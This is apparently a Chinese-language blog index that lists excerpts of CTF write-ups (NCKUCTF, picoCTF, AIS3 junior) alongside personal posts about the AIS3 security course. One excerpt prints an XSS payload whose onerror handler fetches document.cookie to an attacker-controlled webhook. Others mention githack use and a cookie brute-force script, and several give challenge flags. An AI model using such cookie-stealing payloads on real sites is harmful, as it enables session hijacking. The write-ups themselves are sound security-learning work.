AIS3-2025 前言自我開始學資安起,AIS3一直都是我非常想參加的一個課程,他給我的感覺就是厲害的人都要參加 AIS3 ,所以我給自己設定的目標一直都是入選 AIS3 ,成為學員。 眾所周知,進到AIS3 最簡單的方式應該就是 MFC ㄌ,然而,這個方式我卻從來沒有碰過,也再也碰不到了。 在 MFC 2024,原本都已經報名參加並空出時間,沒想到卻和科學探究課程的競賽衝突,為了保護我的科探學分,只好選擇去參加科 2025-08-31 #AIS3 #AIS32025
nckuctf_WEB_writeups 題目連結 shiba-shopRedirectCookieRobots由於題目就叫 Robots ,直接嘗試存取 robots.txt ,發現一個奇怪的路徑。 進入該路徑即獲得flag。 Flag NCKUCTF{robots.txt_M4Y_3XP053_53Cr37_P47H} gitleak進入網頁,發現網頁說 flag 位於 .env 中。 嘗試使用 githack 攻擊 2025-08-11 #junior2025 #CTF #NCKUCTF
nckuctf_Front-end WebSec_writeups 題目連結 XSS1題目無其他限制,嘗試把 admin 的 cookie fetch 到我的 webhook。直接下 Payload: 1<img src=1 onerror=fetch('https://${webhook_URL}?'+document.cookie)> 後,將頁面網址回報給 admin ,即可獲得flag。 Fla 2025-08-11 #junior2025 #CTF #NCKUCTF
WebDecode_writeup 題目連結 進入網頁,看到右上角有三個連結。 進入 about ,發現他說可以嘗試檢查頁面,使用開發人員工具檢查發現包含一個疑似base64編碼後的字串,嘗試用cyberchef解碼即獲得 flag。 Flag window.encryptedFlag = "AiK86LNbiKGzwQxvzZR5cPBVksObhNOY1HuL14tpU/q62R0i 2025-08-10 #junior2025 #writeups #CTF #picoCTF #picoCTF2024
Inspect HTML_writeup 題目連結 開啟開發人員工具,即發現註解中藏有 flag。 Flag window.encryptedFlag = "8h4YT6VE7gRCcjkuucQVZIBzpIxl86S4CkkgTb3+1tWdK6RV7puU0RSlM28J2N7N"; window.flagPrefix = "picoCTF"; 2025-08-10 #junior2025 #writeups #CTF #picoCTF #picoCTF2022
Cookies_writeup 題目連結 進入網頁,發現有一個 cookie 可以控制。 利用 python requests 爆破,發現 name = 18 時會吐出 flag 。 12345678910import requestsi = 0while i >= 0: response = requests.get("http://mercury.picoctf.net:29649/",co 2025-08-10 #junior2025 #writeups #CTF #picoCTF #picoCTF2021
Bookmarklet_writeup 題目連結 進入網頁,看到螢幕中央有一段 JavaScript ,點擊可以複製。 嘗試將其貼上至 consle 中,網頁即會 alert 出 flag 。 Flag window.encryptedFlag = "UTPA7znPx3yYIqu2EGGSgCEBGcizYTqmJVYhU3Ej1xY="; window.flagPrefix = "picoCT 2025-08-10 #junior2025 #writeups #CTF #picoCTF #picoCTF2024
AIS3_junior_2025_Linuxlab_writeup challenge-1進入資料夾,看到 flag ,直接cat即可取得flag。 Flag AIS3{C0N9_Y0UR_F1R57_F1A9_😼} challenge-2進入資料夾,看到 .flag ,直接cat即可取得flag。 Flag AIS3{15_a1_W0N7_M155_D07_🚩} challenge-3根據指示,使用 echo "a" 2025-08-10 #AIS3 junior #junior2025 #writeups #CTF
GET aHEAD_writeup 題目連結 進去網站後發現兩個神奇按鈕,發現按下 choose red 會使用 get method, choose blue 會使用 post method。 猜測使用不同 http request method 會回傳不同資料,故嘗試通靈出使用 HEAD method,成功獲得flag。 Flag window.encryptedFla 2025-08-10 #junior2025 #writeups #CTF #picoCTF #picoCTF2021
AIS3 junior 2025 動機去年我就參加過一次 junior 了,那時的我還很菜,專題基本上也是聽著隊友的做。當時我們做了個 CVE 的復現,雖然以當時的我來說覺得做得不錯,但最終與最佳專題無緣。 但在那次 junior ,我獲得了個人優秀獎,現在回想起來不太確定是因為每個作業都很認真,還是在上台報告時有清楚敘述我們復現時使用到的技術之類的,總之我就拿到了 呱。 所以在報名這次 junior 時,我就將自己的目標定為拿到 2025-06-03 #AIS3 junior #junior2025